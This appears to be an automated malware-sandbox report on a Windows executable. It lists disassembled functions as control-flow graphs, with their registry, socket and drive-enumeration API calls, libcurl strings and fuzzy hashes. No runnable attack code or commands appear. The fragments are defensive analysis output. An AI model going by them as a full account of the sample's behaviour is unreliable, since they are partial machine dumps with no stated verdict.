598 9f9a60-9f9a6e call 9f6d60 591->598 601 9f9a1f-9f9a39 call 9f6840 call 9f63f0 598->601 602 9f9a70-9f9a94 call 9f6200 call 9f67e0 call 9f6320 598->602 601->590 601->591 613 9f9a16-9f9a19 602->613 614 9f9a96-9f9ac6 call 9ed120 602->614 613->601 615 9f9fc1 613->615 620 9f9ac8-9f9adb call 9ed120 614->620 621 9f9ae1-9f9af7 call 9ed190 614->621 617 9f9fc5-9f9ffd call 9f5d00 call 9ee2b0 * 2 615->617 617->564 620->601 620->621 621->601 628 9f9afd-9f9b09 call 9e4fe0 621->628 628->615 633 9f9b0f-9f9b29 call 9ee730 628->633 638 9f9b2f-9f9b3a call 9f78a0 633->638 639 9f9f84-9f9f88 633->639 638->639 646 9f9b40-9f9b54 call 9ee760 638->646 641 9f9f95-9f9f99 639->641 643 9f9f9b-9f9f9e 641->643 644 9f9fa0-9f9fb6 call 9eebf0 * 2 641->644 643->615 643->644 656 9f9fb7-9f9fbe 644->656 652 9f9f8a-9f9f92 646->652 653 9f9b5a-9f9b6e call 9ee730 646->653 652->641 659 9f9b8c-9f9b97 call 9f63f0 653->659 660 9f9b70-9fa004 653->660 656->615 668 9f9b9d-9f9bbf call 9f6740 call 9f63f0 659->668 669 9f9c9a-9f9cab call 9eea00 659->669 665 9fa015-9fa01d 660->665 666 9fa01f-9fa022 665->666 667 9fa024-9fa045 call 9eebf0 * 2 665->667 666->617 666->667 667->617 668->669 686 9f9bc5-9f9bda call 9f6d60 668->686 678 9f9f31-9f9f35 669->678 679 9f9cb1-9f9ccd call 9eea00 call 9ee960 669->679 681 9f9f37-9f9f3a 678->681 682 9f9f40-9f9f61 call 9eebf0 * 2 678->682 695 9f9ccf 679->695 696 9f9cfd-9f9d0e call 9ee960 679->696 681->601 681->682 682->601 686->669 698 9f9be0-9f9bf4 call 9f6200 call 9f67e0 686->698 699 9f9cd1-9f9cec call 9ee9f0 call 9ee4a0 695->699 707 9f9d53-9f9d55 696->707 708 9f9d10 696->708 698->669 715 9f9bfa-9f9c0b call 9f6320 698->715 720 9f9cee-9f9cfb call 9ee9d0 699->720 721 9f9d47-9f9d51 699->721 712 9f9e69-9f9e8e call 9eea40 call 9ee440 707->712 713 9f9d12-9f9d2d call 9ee9f0 call 9ee4a0 708->713 737 9f9e94-9f9eaa call 9ee3c0 712->737 738 9f9e90-9f9e92 712->738 734 9f9d2f-9f9d3c call 9ee9d0 713->734 735 9f9d5a-9f9d6f call 9ee960 713->735 729 9f9b75-9f9b86 call 9eea00 715->729 730 9f9c11-9f9c1c call 9f7b70 715->730 720->696 720->699 726 9f9dca-9f9ddb call 9ee960 721->726 743 9f9e2e-9f9e36 726->743 744 9f9ddd-9f9ddf 726->744 729->659 752 9f9f2d 729->752 730->659 756 9f9c22-9f9c33 call 9ee960 730->756 734->713 763 9f9d3e-9f9d42 734->763 766 9f9dc2 735->766 767 9f9d71-9f9d73 735->767 760 9fa04a-9fa04c 737->760 761 9f9eb0-9f9eb1 737->761 748 9f9eb3-9f9ec4 call 9ee9c0 738->748 749 9f9e3d-9f9e5b call 9eebf0 * 2 743->749 750 9f9e38-9f9e3b 743->750 753 9f9e06-9f9e21 call 9ee9f0 call 9ee4a0 744->753 748->601 769 9f9eca-9f9ed0 748->769 758 9f9e5e-9f9e67 749->758 750->749 750->758 752->678 792 9f9e23-9f9e2c call 9eeac0 753->792 793 9f9de1-9f9dee call 9eec80 753->793 779 9f9c66-9f9c75 call 9f78a0 756->779 780 9f9c35 756->780 758->712 758->748 772 9fa04e-9fa051 760->772 773 9fa057-9fa070 call 9eebf0 * 2 760->773 761->748 763->712 766->726 774 9f9d9a-9f9db5 call 9ee9f0 call 9ee4a0 767->774 777 9f9ee5-9f9ef2 call 9ee9f0 769->777 772->615 772->773 773->656 807 9f9db7-9f9dc0 call 9eeac0 774->807 808 9f9d75-9f9d82 call 9eec80 774->808 777->601 801 9f9ef8-9f9f0e call 9ee440 777->801 797 9f9c7b-9f9c8f call 9ee7c0 779->797 798 9fa011 779->798 787 9f9c37-9f9c51 call 9ee9f0 780->787 787->659 820 9f9c57-9f9c64 call 9ee9d0 787->820 811 9f9df1-9f9e04 call 9ee960 792->811 793->811 797->659 822 9f9c95-9fa00e 797->822 798->665 818 9f9ed2-9f9edf call 9ee9e0 801->818 819 9f9f10-9f9f26 call 9ee3c0 801->819 824 9f9d85-9f9d98 call 9ee960 807->824 808->824 811->743 811->753 818->601 818->777 819->818 835 9f9f28 819->835 820->779 820->787 822->798 824->766 824->774 835->615
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 009F9946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 009F9974
                                                              • RegCloseKey.KERNELBASE(?), ref: 009F998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100
                                                              • Opcode ID: 4b25b2f230252ac47cacc77d48ce4a7096e11842acdade591c5d86209c4c742e
                                                              • Instruction ID: 90e9676269e28dfe604c23ef2761942c6e33e0fc6cfef26775f4aefc4215d7fe
                                                              • Opcode Fuzzy Hash: 4b25b2f230252ac47cacc77d48ce4a7096e11842acdade591c5d86209c4c742e
                                                              • Instruction Fuzzy Hash: 7F32E9B5900245ABEB11AB25EC42B3B76D8AF94318F084838FE0D96263FB31ED14D753
                                                              Function 00968B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1020 968b50-968b69 1021 968be6 1020->1021 1022 968b6b-968b74 1020->1022 1023 968be9 1021->1023 1024 968b76-968b8d 1022->1024 1025 968beb-968bf2 1022->1025 1023->1025 1026 968bf3-968bfe call 96a550 1024->1026 1027 968b8f-968ba7 call 946e40 1024->1027 1032 968de4-968def 1026->1032 1033 968c04-968c08 1026->1033 1034 968bad-968baf 1027->1034 1035 968cd9-968d16 SleepEx 1027->1035 1038 968df5-968e19 call 96a150 1032->1038 1039 968e8c-968e95 1032->1039 1036 968c0e-968c1d 1033->1036 1037 968dbd-968dc3 1033->1037 1040 968ca6-968cb0 1034->1040 1041 968bb5-968bb9 1034->1041 1051 968d22 1035->1051 1052 968d18-968d20 1035->1052 1045 968c35-968c48 call 96a150 1036->1045 1046 968c1f-968c30 connect 1036->1046 1037->1023 1075 968e1b-968e26 1038->1075 1076 968e88 1038->1076 1043 968e97-968e9c 1039->1043 1044 968f00-968f06 1039->1044 1040->1035 1047 968cb2-968cb8 1040->1047 1041->1025 1049 968bbb-968bc2 1041->1049 1053 968e9e-968eb6 call 942a00 1043->1053 1054 968edf-968eef call 9378b0 1043->1054 1044->1025 1074 968c4d-968c4f 1045->1074 1046->1045 1055 968cbe-968cd4 call 96b180 1047->1055 1056 968ddc-968dde 1047->1056 1049->1025 1050 968bc4-968bcc 1049->1050 1058 968bd4-968bda 1050->1058 1059 968bce-968bd2 1050->1059 1061 968d26-968d39 1051->1061 1052->1061 1053->1054 1080 968eb8-968edd call 943410 * 2 1053->1080 1078 968ef2-968efc 1054->1078 1055->1032 1056->1023 1056->1032 1058->1025 1068 968bdc-968be1 1058->1068 1059->1025 1059->1058 1071 968d43-968d61 call 94d8c0 call 96a150 1061->1071 1072 968d3b-968d3d 1061->1072 1077 968dac-968db8 call 9750a0 1068->1077 1099 968d66-968d74 1071->1099 1072->1056 1072->1071 1082 968c51-968c58 1074->1082 1083 968c8e-968c93 1074->1083 1084 968e2e-968e85 call 94d090 call 974fd0 1075->1084 1085 968e28-968e2c 1075->1085 1076->1039 1077->1025 1078->1044 1080->1078 1082->1083 1089 968c5a-968c62 1082->1089 1092 968dc8-968dd9 call 96b100 1083->1092 1093 968c99-968c9f 1083->1093 1084->1076 1085->1076 1085->1084 1095 968c64-968c68 1089->1095 1096 968c6a-968c70 1089->1096 1092->1056 1093->1040 1095->1083 1095->1096 1096->1083 1101 968c72-968c8b call 9750a0 1096->1101 1099->1025 1104 968d7a-968d81 1099->1104 1101->1083 1104->1025 1105 968d87-968d8f 1104->1105 1109 968d91-968d95 1105->1109 1110 968d9b-968da1 1105->1110 1109->1025 1109->1110 1110->1025 1113 968da7 1110->1113 1113->1077
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 00968C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00968CF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnect
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 238548546-879669977
                                                              • Opcode ID: 7d40bb756c8ada4d51fe07fc5eb09afddd49f99d253c8112f9020152d6f51167
                                                              • Instruction ID: 0a8fe6e34fc42dc85cd8280bdf8e957eeee8f1247d5865d9eb2e8693f7383b96
                                                              • Opcode Fuzzy Hash: 7d40bb756c8ada4d51fe07fc5eb09afddd49f99d253c8112f9020152d6f51167
                                                              • Instruction Fuzzy Hash: CDB1D370604305AFDB10DF34C885BA7B7E8AF85318F048A2CE8995B2D2DB75EC55C762
                                                              Function 00932F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1114 932f17-932f8c call d6f570 call d6f960 1119 9331c9-9331cd 1114->1119 1120 9331d3-9331d6 1119->1120 1121 932f91-932ff4 call 931619 RegOpenKeyExA 1119->1121 1124 9331c5 1121->1124 1125 932ffa-93300b 1121->1125 1124->1119 1126 93315c-9331ac RegEnumKeyExA 1125->1126 1127 9331b2-9331c2 RegCloseKey 1126->1127 1128 933010-933083 call 931619 RegOpenKeyExA 1126->1128 1127->1124 1131 933089-9330d4 RegQueryValueExA 1128->1131 1132 93314e-933152 1128->1132 1133 9330d6-933137 call d6f840 call d6f8d0 call d6f960 call d6f770 call d6f960 call d6dce0 1131->1133 1134 93313b-93314b RegCloseKey 1131->1134 1132->1126 1133->1134 1134->1132
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: CloseEnumOpen
                                                              • String ID: d
                                                              • API String ID: 1332880857-2564639436
                                                              • Opcode ID: 5ee082dce2d826e56d65b69095f8cb5e70219e75796db0cdf4cbf783ffbea070
                                                              • Instruction ID: bea9edc7928da3a9f3fcfbdc78f3b60a8d9378608d4ab76cb450d76a9a50d77d
                                                              • Opcode Fuzzy Hash: 5ee082dce2d826e56d65b69095f8cb5e70219e75796db0cdf4cbf783ffbea070
                                                              • Instruction Fuzzy Hash: 8171B3B49043199FDB00EF69D58479EBBF0FF85318F10886DE89897311E7749A888F92
                                                              Function 00969290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1147 969290-9692ed call 9376a0 1150 9693c3-9693ce 1147->1150 1151 9692f3-9692fb 1147->1151 1160 9693e5-969427 call 94d090 call 974f40 1150->1160 1161 9693d0-9693e1 1150->1161 1152 969301-969333 call 94d8c0 call 94d9a0 1151->1152 1153 9693aa-9693af 1151->1153 1171 9693a7 1152->1171 1172 969335-969364 WSAIoctl 1152->1172 1154 969456-969470 1153->1154 1155 9693b5-9693bc 1153->1155 1158 9693be 1155->1158 1159 969429-969431 1155->1159 1158->1154 1163 969433-969437 1159->1163 1164 969439-96943f 1159->1164 1160->1154 1160->1159 1161->1155 1165 9693e3 1161->1165 1163->1154 1163->1164 1164->1154 1169 969441-969453 call 9750a0 1164->1169 1165->1154 1169->1154 1171->1153 1175 969366-96936f 1172->1175 1176 96939b-9693a4 1172->1176 1175->1176 1179 969371-969390 setsockopt 1175->1179 1176->1171 1179->1176 1180 969392-969395 1179->1180 1180->1176
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0096935D
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00969389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 2ebfa9c5756c70d4387c67f4dc1d702c569e7c579db9c9cf8f4b2e4d74e1f2e9
                                                              • Instruction ID: fd1a37886021e8a1b628cb65e8519789b6cb509ccba24e35ed36a4c0d56a7851
                                                              • Opcode Fuzzy Hash: 2ebfa9c5756c70d4387c67f4dc1d702c569e7c579db9c9cf8f4b2e4d74e1f2e9
                                                              • Instruction Fuzzy Hash: 6B51E275604305AFE710DF24C881FAAB7A9FF88314F148529FD489B392EB31E991CB91
                                                              Function 009376A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1181 9376a0-9376be 1182 9376c0-9376c7 1181->1182 1183 9376e6-9376f2 send 1181->1183 1182->1183 1184 9376c9-9376d1 1182->1184 1185 9376f4-937709 call 9372a0 1183->1185 1186 93775e-937762 1183->1186 1187 9376d3-9376e4 1184->1187 1188 93770b-937759 call 9372a0 call 93cb20 call cb8c50 1184->1188 1185->1186 1187->1185 1188->1186
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,00933D4E,00000000,?,?,009407BF), ref: 009376EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-3388739168
                                                              • Opcode ID: edda5ab396176a92e9cde56fe3b4ac1386bda9af97f97f0a16fd33a960081c02
                                                              • Instruction ID: 683649e59b347a06323a48c3ff1a1696972599aee74104e86cbef4e621800de6
                                                              • Opcode Fuzzy Hash: edda5ab396176a92e9cde56fe3b4ac1386bda9af97f97f0a16fd33a960081c02
                                                              • Instruction Fuzzy Hash: 60110DF591C348BFD530A755AD96E277B9CDBC1B6CF451D14F80863242D5519C048AB2
                                                              Function 06D90245 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1200 6d90245-6d904ae GetLogicalDrives 1224 6d904be-6d907c7 call 6d90774 1200->1224
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 999431828-695790028
                                                              • Opcode ID: 4e2b1c61c2bea46703f40c292aeecc21eae665347ec7a43b232ce56fba9e9fd5
                                                              • Instruction ID: e50afeceeac3aa524c6fe3d8aa1c78c8ff8b9327c7133b4d6505c2417fdda236
                                                              • Opcode Fuzzy Hash: 4e2b1c61c2bea46703f40c292aeecc21eae665347ec7a43b232ce56fba9e9fd5
                                                              • Instruction Fuzzy Hash: DA714CEB14C121BD7BC281953B54AFB6B7EE6D6730330842AF847D6902E2D48F4965B1
                                                              Function 06D90284 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1256 6d90284-6d9028e 1257 6d9029c-6d904ae GetLogicalDrives 1256->1257 1258 6d90290-6d9029b 1256->1258 1278 6d904be-6d907c7 call 6d90774 1257->1278 1258->1257
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 0-695790028
                                                              • Opcode ID: c94a9297ba43d5fd91b612b72822d2562d15528328754b8c5723a7488554ea96
                                                              • Instruction ID: 126b7a1ea8dcc8e44d602764420421b64d7c63e73608a0c6c0b1f3fefd453fa2
                                                              • Opcode Fuzzy Hash: c94a9297ba43d5fd91b612b72822d2562d15528328754b8c5723a7488554ea96
                                                              • Instruction Fuzzy Hash: DD717EEB14C121BD7BC281953B54AFB6B7EE7D6730330842AF847D1502E2D48F4965B1
                                                              Function 06D902DE Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 353COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1410 6d902de-6d904ae GetLogicalDrives 1428 6d904be-6d907c7 call 6d90774 1410->1428
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 999431828-695790028
                                                              • Opcode ID: ba292d8d6f0c3383b371f0b383e89c0bdf447060bf9d4570fdbff4e2ea257925
                                                              • Instruction ID: 163c7721b3f26e55583cdaa9e7e8cd3d8e43524b547809e34b625918f38adbd7
                                                              • Opcode Fuzzy Hash: ba292d8d6f0c3383b371f0b383e89c0bdf447060bf9d4570fdbff4e2ea257925
                                                              • Instruction Fuzzy Hash: 16617EEB14C121BE7BC281957B54AFB6B7EE6D6730330842BF487D5902E2C48F4965B1
                                                              Function 06D902FB Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 347COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1460 6d902fb-6d904ae GetLogicalDrives 1476 6d904be-6d907c7 call 6d90774 1460->1476
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 999431828-695790028
                                                              • Opcode ID: 26609328baad0bf591583e59d2e84089d2b47967c30e0f69691c08a162816965
                                                              • Instruction ID: 5f3dc4a7f7bc0b766a27a01b4b969e1ca0f456ae8d53fdc5072e7c4a102aa171
                                                              • Opcode Fuzzy Hash: 26609328baad0bf591583e59d2e84089d2b47967c30e0f69691c08a162816965
                                                              • Instruction Fuzzy Hash: 68616EEB148121BE7BC291953B54AFB6B7EE6D6730330842AF487D1902E2D88F4965B1
                                                              Function 06D90386 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 300COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1508 6d90386-6d904ae GetLogicalDrives 1521 6d904be-6d907c7 call 6d90774 1508->1521
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
